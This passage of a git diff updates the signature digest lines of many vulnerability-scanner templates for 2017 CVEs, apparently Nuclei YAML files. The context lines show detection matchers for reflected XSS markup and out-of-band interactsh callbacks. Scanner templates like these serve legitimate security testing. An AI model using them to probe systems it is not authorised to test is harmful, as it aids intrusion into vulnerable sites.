4a0a0047304502202358489d0379bb346f3858a91b2a2cacf96bee63162aca6c0b1d4dca9b66983f022100e4dd710922f21234f1ce062561a108ae64984e4f567e8df4efd756f76b90972a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220559c424d03911dd6799aaa684eb0314d33bc536014d7d90c4103ee2b8d088a7f022042bc21ea32549d8fad3427d856c78f2f44f14416cf97e3107a35d76c21cbfc34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index b50cc974da..89f6c0272d 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a004730450221008ff0170bcd660ce2429ce461eda55a46a4f04a6aa78034c27cbea4f6cfb3cdb702202c38cdcc28d1fe13043e6fde1547d59900a62e113a4435a4d55369f733dfc6e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c3c838ec3681514c0243a467146f0a33ecb854aedb1d49c273df3254755144b902206350279373637ddb9bd47831c0fdad5219c4fc712fca4e8fd2f9f5e422aeb326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 47578433f0..9cd3d64dfa 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a00473045022100e0b4966d6f79d014af1462bec5ec27f9a4018fb61ae4fcec43608c18eb7a5a3a0220587dd91a12e12f4e37eeaca7ff260510927ef9cca2a957b0353b1e544dd43275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index fcc2f3ec65..34fa4f0f7c 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100ed35c4231ce453dfbe08da9ece699ff1cc5b441bb4948f8821daaa98f54d304c02207d9c02d825b910109cefe3dd4d1f80340a89685da405eb960323f8899f64fb3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f2251d744aabfeace1c58d98a6168a27c0e9ccf07b01ba28a62beb500c1eb1b102207b3a94ae47c6da13df0c49012bef20b2c3adae7e995737421d14e625f705f3a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index fbd815977a..7e59d96b1e 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4b0a0048304602210081312a833d5e4a0131b583b9e4fcd4dc2f3b92ad2e7d06592ab395f87da1c79d0221008c521edc7b7e14c560ab90b3eff4dac4ad5fa5fdac7a5a1d7e382fbc0fc4f2c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206458d4006730c4a6bdb597ea4e80954b9597931fef4f87f163cb4b28987b657802203d4eb091d157207a5fce906ffc3138640c8b86a0b3ac612a19ed87ba4d595de1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 5220fada0e..ceacb3218e 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 4b0a00483046022100f3b5a5536dba5e3f2054a134017a33ce920a42e16c4f7a84ad4e6e78cf3adef6022100f84adfac9c9868490e5e6981d9930f218bd82e545723fd708b4c9333aefa3429:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201999f06f471380c4a357e27656e3414bc2b67ef66905e58db940b8f4e8acbd25022100e9ec783b446f31b93f539f976ecef00eb0dd323d6636426dd3eea9755e06d97c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 2ea8a84582..369a71a426 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 4b0a00483046022100df329805644cde0ad553255fb761adfa242f674ee086cf0f5d34719c3bde287e022100fa590d0ad8ef83dd1ad96397cafb0548eb66f31142337939d936a6fe80b7f7e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dfdd092f491343464d6c590b6acf2c0bdf04559de82c6b54146c8b0a88738ad02207bbdb7b409e82b8423dd405ddf128318f21b54f3253b9b52661507e1051a7dd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index d3239223e2..6814961e70 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 4a0a00473045022100b955b6cb00ed6ace087161ea06204a6f0aeddbe889b1547f6787e2bcdf6e4a4302200f43e562f883bfa106a7968b4120ab3a6e278918fc1c85aa7e1fde99415bb6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205293a265f54eb4b81c79ad219c077a77965dead1472824f948dcd3143ffee520022100a689da744275a02b62e6f8536381e8c0ef762e8ad5f634e252262709b66d5f42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 66cc890559..590b427a09 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4a0a00473045022100c69d8a11728d0868a9498fc98e15897b4a49ce9e5821b8a955e421adaf83adab022043da71c35736dc6c24600c015e365c2f2dcca31a20904bd2b040b04ca26c53df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index e6c7ce7940..6ee9d3e9d2 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 4b0a00483046022100991d52d802a7791d4309384acc8268ca76d4bae06cec94a73c3dc0404e4e0bb502210090b4f87ea55c73611c304d05c1d3e060ab23fe510705db97dcb0dcd656ed00a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ddbc3b18ffce5c0f01e6aaa0a53e37a9e1ffc322041f4005d0da986b8424ba5802200829e15dc39b3ab7ef7518c4fc9fb54dcfd91dd62b06db7b9b515cc620ffe042:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 996d3a0b37..401d3e76a2 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4a0a0047304502200e1bdbf249e62b11dc16f163298e56c4b9c156168ef68bc643d654a2d4514b5a02210089fd71cc4b1ab3b1a8d5f434d3836b86b152d6868df6801faaf5e854748050f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220244d8633a4353c567f2a2526869d844c511961cd0b44cac0330ab4e65bc58094022100c59354ede1947cb25721d15d5d3c3486255c865f5089f08d3a16c2a024396e53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 5f2f23271d..a09fde526e 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 4a0a0047304502210083059c1f5b13527356130ad5adf092ec4b1d5118c386251d089fe83b175ee161022035d557c92ad8a9d4a718c28704e8214145e312a5831e403dfbdf3221b9751d04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009612da1e84e89faf95c46bf93bbe9ff5b4324d9cf249c2ea11be0b07b0ea2828022100d47130fa52caf6c0e48ccbcdb2ccb3e5d677598cfc6fd2103dc896214918dd0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index cee566fcb0..8505e76ddf 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a0047304502207d6c3e88e65cb04540338e8cb53a7c07550baf9be3bb9d7dadb634a24547a24d02210090a780089ffde7c500f1e278bf90e1a382b828e649ea1abab70642932f7954a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009bff238bd64946c67ee890059dd221f87b2d35f7ad9d44bea2ea436f6b5f6b7802200c3e7f2aa6d89f0570866b2bf5d30f6788920246eb34a62d4de1e9eb5bfd4ea8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index a566cdf4b2..747d7581ba 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4b0a00483046022100e1fbf432a168344a813786a974815109339d6a539d0b9924c2d573282d4af726022100900254cabf5f7a7d329613565ae7cdde2b0ef77ba378a91fb00c66e3710a3770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044bdf62c36bb7b800227d14ba30ece1ddf75ecd7b4b684517b13feab210a100f02205086b00b0ef8c3d64e626a6211c749797d020578c055de4a47f1c503ec5d6275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index c5290329ed..fccf2f7c40 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 490a0046304402207f8f541b8970693441ab4358624a728fb1655d531feece8314a8c94dafd5759302201b00ad639048089605ca56feb49217e5633aa0ddadf823dcd6d61d35520b6beb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203be2853b2995aee4cd13397feabfe12f7e512242f3aa12c31183771d0af414ca022073400bbb52be949a6ab5eeb6fd92b4f85fc2c77943e80ff9dd5c6b416e98ddc1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 5a89ef90ac..cf2a3ebcf6 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207636f90f1f13be2fb4123bf2a2a003aedf7808964a56bac0def0932465479b78022033cbd69edf1a73411c1d14cc327c94531fc81ee7e24746c556887f6f80ff40f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008dfc25e42e44683329ba56a8f8cce9eb8c6a9aa9d0f9f90beceb44a98f5cdb1c022100e5dcce4ef98441bdbf6f838eba31ca85845c2ae227f9fcba4ac43ac955b10d42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index 662edf1eb7..9523c2104d 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4b0a00483046022100a616e70f7c5456fdd60f67214d1503b8cd11d90efa913dd1fa7eedf8c9519fd3022100e6c300d92a71027191092a089bf9b041a86bf87e53e39d3e4112a7ef792a1f74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022076238562eddd1e36213dd53dac1756160e04cf8cef34a749b04e9e381e11e25d02206b0039df8d44fd250f9a238a67d8ee2e746b293cd7bb03168ac474d0fbd781d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index f6175a9b94..876ec61a6f 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4a0a0047304502205a3592b39478cdf35fa2fe793277c55d0a9f7688bd44437899b4eb5d22b69c6c022100c0d58c131231ae2c3193510ea9c1d4987917da61489bdc4af83b801a79b24a24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038c75a195a8201f3e1c25d4c7607e4ebba1303c38e530c67b26e86d59ed0b253022073077730c1b33d6f76f4d6dc358a14d52134b338d3d6c6f42c9c6feadaf3bf6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index d7c2f6995c..e9c1acc518 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 490a00463044022055e891955d466173be2cc90c418e67f482feb17a565465255fa9a50b068f5b3c022052bf00622124239122a900c76f3e21de6b948a9eab27890930a66acbb24318f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205b2522d42ee144907f4fdfe0919cf763c028e53a0feb9fe74ff992edfe25530e02207edb18fcd15c9df85940a01d2938f7af35b53a9467256a2efaff7fa1fe3172b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index ec44381fb1..c770580930 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402204fe1ef8a5392b89c75de830044783d08ec0f7acb0a0447f430d04cffee557db3022061b9e977a0a4124532ff12999239abc92b939d21498e9a8a6f6258e5fc2388e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c57f662cb8b84078b787c56d8141bec364cff0d1368caaa91455111d30c7d50c022100c7bea6b80a11efba48bf0a48e3a7db0d030a47fabff6cb588ed338948713f1ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 89242ae85d..801b9ef729 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a00473045022100dff3a1243f91f42c263352b04c6d86e2212c6dbe2038820a30c845c824c5219402202ba18481949ae906daddee2bf6b3c6f68e46aa4ca7a1a7c62d83eb68c8d013aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029a7e4bcf5a78e3d21f5765cc8cd2adea3d370bc9f359a37b0180f45c62f81710220793da03f64207ed6dd38e7ecef724714eeef291b52f36fe0a87cfaa0ddb9d72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 35e97ced95..897f7ea130 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4b0a0048304602210085352fa5eb9e836c5f631c5d985718d590b901d09c5bd350c09fd0daf5b6a26b022100a60917d555640993ce74c285ca1262746b892ead43e22dec9afbe97c2496761f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ea59d223cb8907ad6fbe1fe3c853e2fb644093594327ffc018dc59b73b129f6022037f23ef425ba5b3f9357937e2189419e52391bef4308289c99dad1bf703342ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index b88b76a1d3..72ed7494d8 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a00473045022100f6ad98d2cba799f70f0f72455f7e585f398ef0052ef65a27e0c34e60055bca90022054401e01b1678ce9f622951778d97d35489250fd3398379b1950deec03c0d5c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1316d451adb9cb4b13560cf9650fd0af0acb0879691374e4272c672302f46e7022100f2e19f486c5e73f646bfb14335050adcc0ad2ee50f8b06d562de214c7d9a7f3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index cebaffebce..7a0d5daf99 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502206ae8c3047b55234a52380857bc4aeeb212ee3d1cea2d0c12d18795052e147b32022100c0958b257cf484ee8ea77529e9bc1de1918a77fe2781fcf60c607f8111533a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205db6304f7d491dd4460b71c9ab3066f51630c70cc2a91b91b113937be3baca380220764d78fbadcd8b7ce4330727daae1c7cf57852ed131a0d5bd7c4f58b15c1d04c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 1951293e6b..fdd8dd2053 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, ">\">All")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 490a004630440220192f51072929f60fd5b9113bc2246ca437d78d7d3fc3b86a5e344e6d41035f7f02202717e395028945ff86314dcdc6680ae93f72b49ce55fe0c3b908ff5f68beb188:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200d379d9480f868260b65e821ad630ab781d2dd52c2f0e25e667b41cf3bf9c7cb022068938f861976e3222cbe26a54ec296eef974f942967912acb942edb9a52d2f7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 0ac8ac70e8..c0d880a273 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -45,4 +45,4 @@ http: part: body words: - "console.log" -# digest: 4a0a00473045022050c88ef260d0619e11218a28154fc7db52ec91359d29f4a59f5ba747ff343c21022100ec3b0241243c69bb63a072ebe60a1be1156805095362cc6101c49529687293fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a5cea1178378e035028118fedd2151e39f34fb4b3df4e2162b48a734f53b656402207327cae0caa3aa2b2df17d43bbe581a25438d03242ff4d675c14367bcbb8208c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index b003b043e5..f79e1ee9db 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -40,4 +40,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 490a0046304402201306b79149a1759979fcdf09449b36e03f04b8a042c8ae32969a96357790f09702201b7a11d7eff916991c7ca651c1a2d4b65b4a3c9808c1bfde9c035e97338de547:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a2ead70694f8fbe9b3e3642b2ba252925a11e895d24c116c6fcf822fec79ffc3022100cb724ed9183a630d2b16eb3ad1ea4e8dd9589e0005873b67061634479dbe51eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index 15c94dc89a..2f45529883 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -57,4 +57,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a004630440220175917fef9b6461088885f0b91b311e26395c58ca2bc859870e8b817dff156a90220655034f392342c9cc848968901687aa91fa4aac8161478107729a2a0c2d10652:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220314c8532266e96097573429ea60d7d40bfdd9fa9ff4e09f2c30b60a0b792387b02205cbbb61b25b37ba76ab0552e5298043246cdca5f07c8f227f0e65682cc3f0aa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 42dbd57f0a..f25e3845a8 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -37,4 +37,4 @@ http: part: body words: - 'noresize src="/\interact.sh?configName=' -# digest: 4b0a00483046022100c3df2820b79b8cbc12d770178290c4dfb25be24d01844105835deb52e57ccd78022100994d28802ae31b97f827cf0243d13ed467e2fbca47b376d8bfeee494891e9388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205da5b0dfa08c9d47cc1cc445964d1ab6c810d5f0c8c9175894f8537dfc2c817002200912ff25081157c64feae2ea13a595e79e1059083d1708086adbe0da6668b8f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index 4191ce4aff..4ad88aa2ff 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -47,4 +47,4 @@ http: part: header words: - "text/html" -# digest: 4b0a004830460221008ca4559e5a6f00aa527d1a1048a85bf4b505772a02456c51b48f78474ed8bf16022100b8d7de7fbe7c46b94a8ca4c3010fac2db56b7400480cab0fe72203ff618a3193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210082e8a99305a0d02578786fa86786227ecd9e97204ec133b411441b070eb5d76e022100d1a91d167063225f939dd702b8166495d4be6dd98a4d686b6277ceade578ca09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index 227097dbaf..3ecf701509 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -65,4 +65,4 @@ http: - '.[] | .slug' - '.[].name' part: body -# digest: 4a0a00473045022012362c3e5d6328b56620ca5ba033d652c01140ab49135a379f1fc623d1dabc80022100b3f06e821337ae0f1da2edea5c31e37a8c383e1c92dbec597ea16233f6d6491e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e40ba5eef0eb787e968ef0a9607eec00183b07e912e9ce515bad8335f6327c530221008582bb7f870ea59f6e1e7cbc292f107dbe1baf44f82cc8def017a816eeb0f016:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index 2af1f7f898..501f03a2c3 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022049cc47bd934d92822b69ef3ae0b679bac2f61d2d3c05e2ba84c0daa804b94bd9022100b0daa20a36023cb335bcef703a4be02cbdbe8a2635e52659d0007a0504415f6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 9e4cd30bdb..fe6ee959ce 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204f40cf04bd12a4315fae5af77ff6dab6c4c2de3fb391356745992aa71a6feb8d022035b63f7ee7c589465ac060e6cdaabd793cb33ba4711442416dda651a72dc0f78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b7fb4783270359aa61923d9ec3041ebcabb0dda75d5d6e3cd6f3941102766df9022100bce7ff5f567fd4e3724a5b4f83dcaa01a07125e1fb06aa5c6fab61c31f2ff054:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 166b732d1e..110858d4e3 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fbe4f775fe83ed866915c29662a0884710cb6849a95fee93c60cd278c9551e9c022100e229c1ef4b96aeade9ffc8da95cc64cc3d6b75a4ec70d80dd7741a024d29a576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d36a0a6ce53663b4df58edd2651cfabc4f1437498a323b77f7ac18d16834fe902204ab785dc772dd44c8af8cf338753ebd93f52d5425d3e9c03a6512547dc521083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 793c4393ec..76beba2d9c 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203674b13569954ddcb49c7a9fd1e250449dfbd965c265f88299a6597ec0b3401302204fa71f5cb267e9c191f41e21e6f67db25f2b6505760f156dc7c65c6d7c5c753d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a26df623c1963f8cdce187b3a233e2093c2577ea79dabbe42ca86491275c96b9022100ef407a8ffdb985df93f2461bdaa4c1c7c26c474caec5ee4c3ffe984123aff930:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index d7df7659d8..bee2283451 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -40,4 +40,4 